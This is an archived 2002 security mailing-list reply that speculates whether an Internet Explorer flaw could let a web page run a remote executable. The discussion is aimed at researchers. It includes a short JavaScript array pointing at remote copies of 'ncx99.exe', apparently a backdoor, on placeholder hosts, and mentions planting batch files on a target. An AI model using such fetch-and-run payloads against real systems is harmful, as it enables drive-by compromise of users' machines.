Re: Rather large MSIE-hole
From: KF (dotslash@snosoft.com)Date: 03/14/02
- Previous message: jon schatz: "Re: Rather large MSIE-hole"
- In reply to: Paul D. Campbell: "Re: Rather large MSIE-hole"
- Next in thread: jon schatz: "Re: Rather large MSIE-hole"
- Next in thread: Slow2Show: "Re: Rather large MSIE-hole"
- Reply: jon schatz: "Re: Rather large MSIE-hole"
- Reply: Chad Thunberg: "RE: Rather large MSIE-hole"
- Reply: Joerg Over: "Re: Rather large MSIE-hole"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 14 Mar 2002 17:48:27 -0500 From: KF <dotslash@snosoft.com> To: vuln-dev@security-focus.com
Another thought... will this bug run an executable from a web page? If
so you could just make your own binary to do whatever you wanted. Like
http://mysiteathome.com/malware.exe or something along those lines. I
would HOPE that it asks to save the file to disk or even better ignore
it all together. Maybe try something like:
var programName=new Array(
'http://mysiteathome.com/ncx99.exe',
'http://someothersite.com/ncx99.exe',
);
I would do this myself but I don't have any windows boxen to test.
-KF
Paul D. Campbell wrote:
>>Could you not create a batch file that housed the commands you wanted
>>to run
>>(with args) and just run the batch file?
>>I apologise if someone has already addressed this.
>>
>>-Eric
>>
>
>You would probably be able to do this. However, you would first need
>to place the batch file on the target machine. Then you would have to
>sit around and hope the user visits your malicious site. Though, if
>you have the capability to write to someone's harddrive you could do
>something much nastier than this :)
>
>Paul
>
>
- Previous message: jon schatz: "Re: Rather large MSIE-hole"
- In reply to: Paul D. Campbell: "Re: Rather large MSIE-hole"
- Next in thread: jon schatz: "Re: Rather large MSIE-hole"
- Next in thread: Slow2Show: "Re: Rather large MSIE-hole"
- Reply: jon schatz: "Re: Rather large MSIE-hole"
- Reply: Chad Thunberg: "RE: Rather large MSIE-hole"
- Reply: Joerg Over: "Re: Rather large MSIE-hole"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|